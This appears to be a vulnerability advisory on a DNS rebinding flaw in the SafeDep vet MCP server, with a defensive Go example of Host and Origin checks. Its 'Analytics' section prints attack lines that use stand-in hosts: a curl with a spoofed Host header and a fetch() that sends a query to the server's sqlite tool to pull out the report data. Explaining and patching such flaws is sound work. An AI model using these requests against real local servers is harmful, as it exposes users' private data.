How CVE-2024-45703 Works
The vulnerability is a classic DNS rebinding attack against the SafeDep vet MCP server when it is configured to use the Server-Sent Events (SSE) transport. The attack exploits the server's lack of validation of the HTTP `Host` and `Origin` headers.

An attacker registers a domain name and configures it with a very short Time-To-Live (TTL), then lures a victim to their malicious website. When the victim's browser loads the site, the attacker's domain resolves to the malicious server. The site runs a script that makes a request to the vet SSE server. After the initial response, the attacker rebinds the domain's DNS record to resolve to 127.0.0.1.

The victim's browser still treats the domain as the same origin, because the same-origin policy is keyed on the hostname rather than the IP address, so subsequent requests are directed to the vet server on localhost. Since the vet server does not validate the `Host` or `Origin` headers, it accepts these requests. The attacker can then use the MCP server's sqlite3 query tool to exfiltrate sensitive scan report data from the local database.
Platform: SafeDep vet
Version: < v1.12.5
Vulnerability: DNS Rebinding
Severity: Critical
Date: 2024
Prediction: Patched in v1.12.5
What Undercode Say:
Analytics
`nslookup -type=A attacker.com`
`curl -H "Host: localhost:8080" http://attacker.com/mcp`
`fetch('http://rebound-domain/mcp/tools/sqlite_query', {method: 'POST', body: JSON.stringify({query: 'SELECT * FROM reports;'})})`
How the Exploit Works:
Malicious website script.
DNS rebinding to 127.0.0.1.
Bypasses origin checks.
Uses MCP sqlite3 tool.
Exfiltrates database contents.
Protection from this CVE
Update to v1.12.5.
Validate Host header.
Use stdio transport.
Restrict server access.
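One way to implement the Host and Origin validation listed above, as an added Go example (not SafeDep's patch and not code from the original post). The loopback allowlist, the function names and the attacker.example hostname are assumptions made for illustration; after a rebind the browser still sends the attacker's domain in `Host`, which is what the guard rejects.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// Assumption: the server is meant to be reached only under these loopback names.
var allowedHosts = map[string]bool{"localhost": true, "127.0.0.1": true, "::1": true}

// HostAllowed checks a Host header value after stripping the port and IPv6 brackets.
func HostAllowed(hostport string) bool {
	host, _, err := net.SplitHostPort(hostport)
	if err != nil { // no port in the header value
		host = strings.Trim(hostport, "[]")
	}
	return allowedHosts[strings.ToLower(host)]
}

// OriginAllowed accepts an absent Origin (non-browser client) or a loopback http(s) origin.
func OriginAllowed(origin string) bool {
	u, err := url.Parse(origin)
	return origin == "" || (err == nil && (u.Scheme == "http" || u.Scheme == "https") && HostAllowed(u.Host))
}

// GuardLoopback answers 403 before the wrapped handler runs when either check fails.
func GuardLoopback(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if !HostAllowed(r.Host) || !OriginAllowed(r.Header.Get("Origin")) {
			http.Error(w, "forbidden host or origin", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// StatusFor sends one constructed request through the guard and returns the HTTP status.
func StatusFor(host, origin string) int {
	req := httptest.NewRequest(http.MethodPost, "http://"+host+"/", nil)
	req.Header.Set("Origin", origin) // an empty value reads back as "no Origin header"
	rec := httptest.NewRecorder()
	GuardLoopback(http.HandlerFunc(func(http.ResponseWriter, *http.Request) {})).ServeHTTP(rec, req)
	return rec.Code
}

func main() { fmt.Println(StatusFor("localhost:8080", ""), StatusFor("attacker.example:8080", "")) }
```

Wrapping the SSE handler with `GuardLoopback` means a request that arrives on 127.0.0.1 under a rebound hostname is refused even when the browser omits `Origin`.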
Impact:
Unauthorized data access.
Scan report exfiltration.
Information disclosure.
Loss of confidentiality.
Sources:
Reported By: github.com

